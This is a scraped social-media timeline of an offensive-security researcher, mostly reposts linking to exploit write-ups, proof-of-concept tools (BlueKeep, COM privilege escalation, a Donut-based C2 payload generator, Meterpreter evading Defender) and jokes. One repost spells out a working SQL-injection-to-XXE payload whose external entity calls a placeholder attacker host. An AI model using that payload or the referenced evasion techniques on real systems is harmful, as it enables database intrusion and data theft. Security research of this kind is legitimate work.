nixbyte's profile picture. http://github.com/n1xbyte | APT69

nixbyte

@nixbyte

http://github.com/n1xbyte | APT69

nixbyte reposted

Recently, it was necessary to write an RCE exploit for a remote UAF N-day vulnerability (ZDI-17-836). This post goes through root cause analysis and exploitation. Also, I present a tool / methodology to avoid heap sprays. primalcerebral.com/blog/egregious…


nixbyte reposted

Thanks to @NCCGroupInfosec for releasing their write up on CVE-2019-1405 and CVE-2019-1322. I figured it is time for me to learn some COM stuff so I whip up a PoC. Source: github.com/apt69/COMahawk . Video: vimeo.com/373051209 Thanks to @leoloobeek and @TomahawkApt69


github.com/n1xbyte/donutCS .NET Core version of @TheRealWover's Donut. Rewrote for dynamic usage with C2 payload generation. Stable in .NET for Linux and Windows. Other cool stuff in store. Possible Nuget package in the futureeeeeezzzzz

github.com

GitHub - n1xbyte/donutCS: dem sharp donuts

dem sharp donuts. Contribute to n1xbyte/donutCS development by creating an account on GitHub.


nixbyte reposted

After 10 days of minimal sleep and thank to @nixbyte for the majority of the work, here we have it - #bluekeep #LPE. I've learned so much along the way and I am looking forward to the RCE version. vimeo.com/349496580

SpecialHoang's tweet card. Bluekeep LPE PoC

vimeo.com

Vimeo

Bluekeep LPE PoC


nixbyte reposted

Like y’all ain’t running burp at 500 threads too

Could you imagine how reckless and dangerous the pentester equivalent of a "10x engineer" would be?



nixbyte reposted

There is now a public DOS POC for CVE-2019-0708 (BlueKeep) I just tested it myself here:


nixbyte reposted

Want to use a persistent, hardware based foothold on a red team? Hack into the actual hardware on your processor: Intel AMT & DEATHMETAL: coalfire.com/The-Coalfire-B… courtesy of @VTeissler


nixbyte reposted

MOV - Literally Copy Something Instead Of Moving It


nixbyte reposted

A “late” registration in our @DerbyCon training. @TrevorTheRoach my friend- it’s good to see you (yes- a real pick from our room)

JaredDeMott's tweet image. A “late” registration in our @DerbyCon training. @TrevorTheRoach my friend- it’s good to see you (yes- a real pick from our room)
JaredDeMott's tweet image. A “late” registration in our @DerbyCon training. @TrevorTheRoach my friend- it’s good to see you (yes- a real pick from our room)

nixbyte reposted

Roses are red Stack buffers are fixed-size in C nop nop nop nop jmp esp #NewEndingsToRosesAreRed


nixbyte reposted

SQLi to XXE using xmltype() and passing to extractvalue(). id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "haxor.com">%evil;]>'),'/l') from dual)||'


nixbyte reposted

New blog is up: Today we are executing Meterpreter on Windows 10 without upsetting Defender. Thanks to @Ben0xA @Spoonman1091 @subTee n00py.io/2018/06/execut…


nixbyte reposted

Arbitrary Code Execution At Ring 0 Using CVE-2018-8897: blog.can.ac/2018/05/11/arb…


nixbyte reposted

if you then you don't don't love me deserve at my me at my

b1ack0wl's tweet image. if you                                     then you don&apos;t
don&apos;t love me                       deserve
at my                                      me at my
b1ack0wl's tweet image. if you                                     then you don&apos;t
don&apos;t love me                       deserve
at my                                      me at my

nixbyte reposted

Good news: you no longer need special registry keys to get the Meltdown/Spectre paches for your client Windows machines (blogs.windows.com/windowsexperie…). Bad news, @Kaspersky now has a special place in your kernel.

aionescu's tweet image. Good news: you no longer need special registry keys to get the Meltdown/Spectre paches for your client Windows machines (blogs.windows.com/windowsexperie…). Bad news, @Kaspersky now has a special place in your kernel.

nixbyte reposted

This Tuesday (2/13), learn about Mimikatz in detail from Dusty Evanoff, and @h3xg4m3s will be continuing his series with part 3 of attacking Active Directory (github.com/h3xg4m3s/Attac…). Info & free reg at seckc.org.


nixbyte reposted

Our own Ryan Preston is killing it @ #seckc. Hacking Active D: Part Deux

depthsecurity's tweet image. Our own Ryan Preston is killing it @ #seckc. Hacking Active D: Part Deux

nixbyte reposted

I DONT UNDERSTAND BITCOIN 💰😪


Loading...

Something went wrong.


Something went wrong.